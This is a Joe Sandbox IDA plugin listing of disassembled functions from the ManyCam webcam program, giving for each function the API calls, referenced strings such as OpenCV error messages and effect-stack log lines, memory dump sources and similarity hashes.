??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(map/set<T> too long,744843B1,?,?,00000000,00535759,000000FF,?,004D4C24,?,00000001,00000000,?,00000001,00000000,00000000), ref: 004D4DC4
std::bad_exception::bad_exception.LIBCMTD ref: 004D4DD8
_CxxThrowException.MSVCR80($LM,0057CBF8), ref: 004D4DE6
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80($LM,0057CBF8,?,?,?,00000000,00535759,000000FF,?,004D4C24,?,00000001,00000000,?,00000001,00000000), ref: 004D4DF5

Strings

$LM, xrefs: 004D4DD5, 004D4DE2, 004D4DE5
map/set<T> too long, xrefs: 004D4DBC

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: $LM$map/set<T> too long
API String ID: 3248949544-3238143215
Opcode ID: b3a5ef0cd3d0604de93e7cfc4f998ecbca4839092f53841d330d18dc272e40e7
Instruction ID: a07927191520cae1e6be455f76438f534ad6819f987c116f95f500b89d554bea
Opcode Fuzzy Hash: b3a5ef0cd3d0604de93e7cfc4f998ecbca4839092f53841d330d18dc272e40e7
Instruction Fuzzy Hash: A9D10B71A142159FCB04EFE5E8A1E6F7776AFC9304B50455FF0129B359DA38AC02CBA8

Function 004AAB20 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 256COMMON

Download Yara Rule

APIs

Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5

Concurrency::task_options::get_scheduler.LIBCPMTD ref: 004AAC1D
Concurrency::details::SchedulerBase::GetPolicy.LIBCMTD ref: 004AAC4F

Part of subcall function 00438AF0: clock.MSVCR80 ref: 00438B1F

Strings

Inserting effect %s\%s\%s to stack at position %d., xrefs: 004AAC73
Inserting effect %s to stack at position %d., xrefs: 004AACE1
CVideoProcessor::InsertEffectToStack, xrefs: 004AAB4B

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: clock$AllocatorBase::Concurrency::details::Concurrency::task_options::get_schedulerDebugHeapPolicyScheduler
String ID: CVideoProcessor::InsertEffectToStack$Inserting effect %s to stack at position %d.$Inserting effect %s\%s\%s to stack at position %d.
API String ID: 1896687067-3121683814
Opcode ID: 2f379fbdc71ef8fe106dd6932f9e4df42c7bfac42d585d9b32fea62b007a0ea8
Instruction ID: 105fcc333d0e6ff14583993c1dd746094cb4f3fab98b4d368d8a839d86cc259d
Opcode Fuzzy Hash: 2f379fbdc71ef8fe106dd6932f9e4df42c7bfac42d585d9b32fea62b007a0ea8
Instruction Fuzzy Hash: 56B12B70900208EFCB14DFA8C891BDEBBB5BF59314F10825EE419AB391DB74AE45CB95

Function 004F6860 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 180memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 004F68AB
_DebugHeapAllocator.LIBCPMTD ref: 004F68DB
_DebugHeapAllocator.LIBCPMTD ref: 004F6903
_DebugHeapAllocator.LIBCPMTD ref: 004F692B

Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB139
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB155
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB171
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1A3
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1D6

??0CxImage@@QAE@K@Z.CXIMAGECRT(00000000,000000FF,?,?,?,?,?,?,?,?,?,00000000,?,00000001,744843B1), ref: 004F696D

Part of subcall function 004CB5F0: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 004CB626
Part of subcall function 004CB5F0: _wmkdir.MSVCR80 ref: 004CB633

Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EE68
Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EEAA

Part of subcall function 004164A0: FindFirstFileW.KERNEL32(00000000,00000104,000000D8,00000104,00000000), ref: 004164F5

Strings

\ManyCam\BackgroundEffect, xrefs: 004F69A8

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$FileFindFirstFolderImage@@PathSpecial_wmkdir
String ID: \ManyCam\BackgroundEffect
API String ID: 711174743-980167294
Opcode ID: be2178804a92c928cd2aed66c8cbe30649dd095b03b0f11a4b1ac172dfbbafa9
Instruction ID: 1d1004133df218b0561d43129003d36592f772ef424460559cb02d2d1cb950c8
Opcode Fuzzy Hash: be2178804a92c928cd2aed66c8cbe30649dd095b03b0f11a4b1ac172dfbbafa9
Instruction Fuzzy Hash: 5E8189B0901258DEDB14EF64DC41BDEBBB6AB94308F0081DEE449A3281DB795B98CF95

Function 00513CB0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 140COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetPolicy.LIBCMTD ref: 00513D55
Concurrency::task_options::get_scheduler.LIBCPMTD ref: 00513D92
cvCreateImage.CXCORE099(?,?,00000008,00000004), ref: 00513E4E
cvResize.CV099(00000000,00000000,00000001), ref: 00513E63

Strings

Avatars, xrefs: 00513D7F
Objects, xrefs: 00513D42

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Base::Concurrency::details::Concurrency::task_options::get_schedulerCreateImagePolicyResizeScheduler
String ID: Avatars$Objects
API String ID: 2992923878-1969768225
Opcode ID: 88d80d9e5b1925a2c6919934a6c20aa7d629ba449a3cc0373393a8c87a9d5497
Instruction ID: 11ef104c15373c8e9f941a2410d1520fa6931b44404b7003273920e72e9da790
Opcode Fuzzy Hash: 88d80d9e5b1925a2c6919934a6c20aa7d629ba449a3cc0373393a8c87a9d5497
Instruction Fuzzy Hash: 385189B1D00209DBDF04DFA5E8A66EEBFB5FF48300F10816AE455BB294DB355A58CB81

Function 00405430 Relevance: 10.6, APIs: 7, Instructions: 129COMMON

Download Yara Rule

APIs

cvSet.CXCORE099(?,?,?,?,?,?,?,00000000,?,?,00405609,00000000,?,?,?,?), ref: 00405455
_CIcos.MSVCR80 ref: 004054AB
_CIsin.MSVCR80 ref: 004054C0
_CIcos.MSVCR80 ref: 00405513
_CIsin.MSVCR80 ref: 00405528

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: IcosIsin
String ID:
API String ID: 14690888-0
Opcode ID: 276f5b0b340e471206aa856c43127869a290fb93fcdf002dd0d7d5e66133fcaa
Instruction ID: f55afc7f36c79dbe8a91edad75af3db0966c0985aa664003f4d56b1ff0a10eb2
Opcode Fuzzy Hash: 276f5b0b340e471206aa856c43127869a290fb93fcdf002dd0d7d5e66133fcaa
Instruction Fuzzy Hash: A351AF34609602DFC324DF14E68982ABBB0FF84700B918D88E4E5676A9D731E879CA56

Function 004A93F0 Relevance: 10.6, APIs: 7, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795

_DebugHeapAllocator.LIBCPMTD ref: 004A945B

Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E

Part of subcall function 004164A0: FindFirstFileW.KERNEL32(00000000,00000104,000000D8,00000104,00000000), ref: 004164F5

wcscmp.MSVCR80 ref: 004A948B
wcscmp.MSVCR80 ref: 004A94A4
_DebugHeapAllocator.LIBCPMTD ref: 004A94F6
_DebugHeapAllocator.LIBCPMTD ref: 004A9508
wcslen.MSVCR80 ref: 004A9514
wcslen.MSVCR80 ref: 004A957A

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$wcscmpwcslen$FileFindFirst
String ID:
API String ID: 1577558999-0
Opcode ID: 0cb7d27af655883c31428af5e0bb9fad3cc48976a5dbef61661fdd01497b3954
Instruction ID: f16ea4ad88e480f90c3d3a557b52af9eaab9dd6428fdd0c1f69d551c8bda1375
Opcode Fuzzy Hash: 0cb7d27af655883c31428af5e0bb9fad3cc48976a5dbef61661fdd01497b3954
Instruction Fuzzy Hash: 5E5120B19041189BCB24EB65DD91BEDB774BF14308F0085EE960A62281EF34AF88CF5C

Function 00BEA891 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

cvGetMat.GLU32(?,?,00000000,00000000), ref: 00BEA919
cvGetErrStatus.GLU32 ref: 00BEA923
cvError.GLU32(000000FF,cvMahalanobis,Inner function failed.,.\cxmatmul.cpp,00000AEE), ref: 00BEA942

Strings

.\cxmatmul.cpp, xrefs: 00BEA931
Inner function failed., xrefs: 00BEA936
cvMahalanobis, xrefs: 00BEA93B

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: ErrorStatus
String ID: .\cxmatmul.cpp$Inner function failed.$cvMahalanobis
API String ID: 1596131371-28596163
Opcode ID: de3b8b1571bbe866b1f5dc7b9fbc5634d31a66aae2555a77b59fe0dfd8215828
Instruction ID: 45b7dfd29e385daf07ec4b06b002e5c8482f5faf74f1e27d1be7b1ff6428430c
Opcode Fuzzy Hash: de3b8b1571bbe866b1f5dc7b9fbc5634d31a66aae2555a77b59fe0dfd8215828
Instruction Fuzzy Hash: 39212475E003499BDF10DF95DC8179FB7F8EB04324F0100EAE911AB381EBB06A058B92

Function 00BC4050 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

cvError.GLU32(FFFFFF2D,cvSetSeqBlockSize,00C4124F,.\cxdatastructs.cpp,000001F4,0000BA50,00BC76EE,00000000,00000400,?,?,?,?,00000000), ref: 00BC4089

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

cvError.GLU32(FFFFFF2D,cvSetSeqBlockSize,Storage block size is too small to fit the sequence elements,.\cxdatastructs.cpp,00000204,00000000,0000BA50,00BC76EE,00000000,00000400,?,?,?,?,00000000), ref: 00BC40E1
cvError.GLU32(000000E5,cvSetSeqBlockSize,00C4124F,.\cxdatastructs.cpp,000001F2,0000BA50,00BC76EE,00000000,00000400,?,?,?,?,00000000), ref: 00BC4108

Strings

Storage block size is too small to fit the sequence elements, xrefs: 00BC40D2
.\cxdatastructs.cpp, xrefs: 00BC4075, 00BC40CD, 00BC40F7
cvSetSeqBlockSize, xrefs: 00BC407F, 00BC40D7, 00BC4101

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$Status
String ID: .\cxdatastructs.cpp$Storage block size is too small to fit the sequence elements$cvSetSeqBlockSize
API String ID: 483703942-3159673213
Opcode ID: e424a18200a1e8a0996a9b58e7664e9043b5072e5cdde9177e2c3a4a6cd2fee0
Instruction ID: 58eee1b983b45178b32765cd5a5c4aad61a84c00ff74cbedfbb47b449f101842
Opcode Fuzzy Hash: e424a18200a1e8a0996a9b58e7664e9043b5072e5cdde9177e2c3a4a6cd2fee0
Instruction Fuzzy Hash: 3D0126727C471127DB04A92DFC13F1A62D6AB91F24B5842BDF610E72CAE6E1E9814150

Function 004B5F10 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(vector<T> too long,744843B1,?,?,?,?,?,?,?,00000000,005337E9,000000FF,?,004B5503,004B1AE0), ref: 004B5F3D
std::bad_exception::bad_exception.LIBCMTD ref: 004B5F51
_CxxThrowException.MSVCR80(?,0057CBF8), ref: 004B5F5F
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(?,0057CBF8,?,?,?,?,?,?,?,?,00000000,005337E9,000000FF,?,004B5503,004B1AE0), ref: 004B5F6E

Strings

CKK, xrefs: 004B5F2C, 004B5F74
vector<T> too long, xrefs: 004B5F35

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: CKK$vector<T> too long
API String ID: 3248949544-3216571628
Opcode ID: 3718fa35949eba5a82b900746a9376809f8905b55e5b69c6eb2af84f65c3591d
Instruction ID: c8d92b487c042dcc06c93ea087005db71d51a26c7136d47a4fad7ddcb25ee778
Opcode Fuzzy Hash: 3718fa35949eba5a82b900746a9376809f8905b55e5b69c6eb2af84f65c3591d
Instruction Fuzzy Hash: 47F0AFB1904248EBCB14DF90ED41FDDBB78FB04720F40022AF812A32C0DB756A08CB54

Function 00BCC800 Relevance: 9.3, APIs: 6, Instructions: 266COMMON

Download Yara Rule

APIs

cvSeqSort.GLU32(?,00BCA1B0,00000000), ref: 00BCC899

Part of subcall function 00BC5230: cvError.GLU32(000000E5,cvSeqSort,Null compare function,.\cxdatastructs.cpp,00000880), ref: 00BC5278

cvStartReadSeq.GLU32(?,?,00000000,?,00BCA1B0,00000000), ref: 00BCC8A6
cvChangeSeqBlock.GLU32(?,00000001), ref: 00BCC8D6
cvSeqPush.GLU32 ref: 00BCC8F4
cvStartReadSeq.GLU32(?,?,00000000), ref: 00BCC90A

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: ReadStart$BlockChangeErrorPushSort
String ID:
API String ID: 380159540-0
Opcode ID: 30a71c4b6ec9a6ae2987300251db28d2d78c92ac6ea00686f07a6d53c5c31302
Instruction ID: d2fbb287b672700519205dcb8655bbbd61a17a1675b4a3b34358c84d333fcd4a
Opcode Fuzzy Hash: 30a71c4b6ec9a6ae2987300251db28d2d78c92ac6ea00686f07a6d53c5c31302
Instruction Fuzzy Hash: 6AA11671A083058FC714CF58C581A2AFBE1FFA8714F5489AEE88997315D370ED85CB96

Function 004E2290 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(map/set<T> too long,744843B1,?,?,00000000,00536A39,000000FF,?,004E1A94,?,00000001,00000000,004E0575,00000001,00000000,00000000), ref: 004E22D4
std::bad_exception::bad_exception.LIBCMTD ref: 004E22E8
_CxxThrowException.MSVCR80(004E1A94,0057CBF8), ref: 004E22F6
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(004E1A94,0057CBF8,?,?,?,00000000,00536A39,000000FF,?,004E1A94,?,00000001,00000000,004E0575,00000001,00000000), ref: 004E2305

Strings

map/set<T> too long, xrefs: 004E22CC

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: map/set<T> too long
API String ID: 3248949544-1285458680
Opcode ID: 037b1c6f34042e82ce7b50c5ae10a42ae7eaf65c3770f3036ce6bbe0d0c371b4
Instruction ID: eb3dced5db3925a888724237d041c26940005993663a78e11fc02054abcc7e87
Opcode Fuzzy Hash: 037b1c6f34042e82ce7b50c5ae10a42ae7eaf65c3770f3036ce6bbe0d0c371b4
Instruction Fuzzy Hash: E7D10F70A002C99FCB04EFAAC991D6F777ABF89345B10455EF4119F366CA78AC01DBA4

Function 0048C8C0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(map/set<T> too long,744843B1,?,?,?,00530F19,000000FF,?,0048A224,?,00000001,?,?,00000001,00000000,00000000), ref: 0048C904
std::bad_exception::bad_exception.LIBCMTD ref: 0048C918
_CxxThrowException.MSVCR80(0048A224,0057CBF8), ref: 0048C926
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(0048A224,0057CBF8,?,?,?,00530F19,000000FF,?,0048A224,?,00000001,?,?,00000001,00000000,00000000), ref: 0048C935

Strings

map/set<T> too long, xrefs: 0048C8FC

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: map/set<T> too long
API String ID: 3248949544-1285458680
Opcode ID: 5d9bd5cfefa7126eaa9cce7f59cf12a6ec2056fb24f196b19c599b19faf1435e
Instruction ID: 781e3e5cdacf5d297dd74e0af013611e08a9c6e7430d9740113c692fd0013158
Opcode Fuzzy Hash: 5d9bd5cfefa7126eaa9cce7f59cf12a6ec2056fb24f196b19c599b19faf1435e
Instruction Fuzzy Hash: B0D1ED70A002499FCB04FFA5C891D6F7775EF8A708F20496EF6159B255CB38AD05CBA8

Function 00474C80 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(map/set<T> too long,744843B1,?,?,00000000,0052F989,000000FF,?,00474884,?,00000001,00000000,004A9763,00000001,00000000,00000000), ref: 00474CC4
std::bad_exception::bad_exception.LIBCMTD ref: 00474CD8
_CxxThrowException.MSVCR80(00474884,0057CBF8), ref: 00474CE6
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(00474884,0057CBF8,?,?,?,00000000,0052F989,000000FF,?,00474884,?,00000001,00000000,004A9763,00000001,00000000), ref: 00474CF5

Strings

map/set<T> too long, xrefs: 00474CBC

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
String ID: map/set<T> too long
API String ID: 3248949544-1285458680
Opcode ID: fb5a5b0bfe5d7466eb37912541b6a1e1978402ae83b6b00b3775f69bc8b7d628
Instruction ID: 902e9eb1271cb93d2a72db74486b01d1d5c84e1b516abcfe74867b495f5f0d12
Opcode Fuzzy Hash: fb5a5b0bfe5d7466eb37912541b6a1e1978402ae83b6b00b3775f69bc8b7d628
Instruction Fuzzy Hash: 1ED1FB70A002099FCB04EFA5D891EEF7776AF89318B20855EF4159F295CB38AC51CBA5

Function 0048CF10 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336COMMON

Download Yara Rule

APIs

??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(map/set<T> too long,744843B1,?,?,?,00530F49,000000FF,?,0048A514,?,00000001,?,?,00000001,00000000,00000000), ref: 0048CF54
std::bad_exception::bad_exception.LIBCMTD ref: 0048CF68
_CxxThrowException.MSVCR80(0048A514,0057CBF8), ref: 0048CF76
??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(0048A514,0057CBF8,?,?,?,00530F49,000000FF,?,0048A514,?,00000001,?,?,00000001,00000000,00000000), ref: 0048CF85

Strings

map/set<T> too long, xrefs: 0048CF4C

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
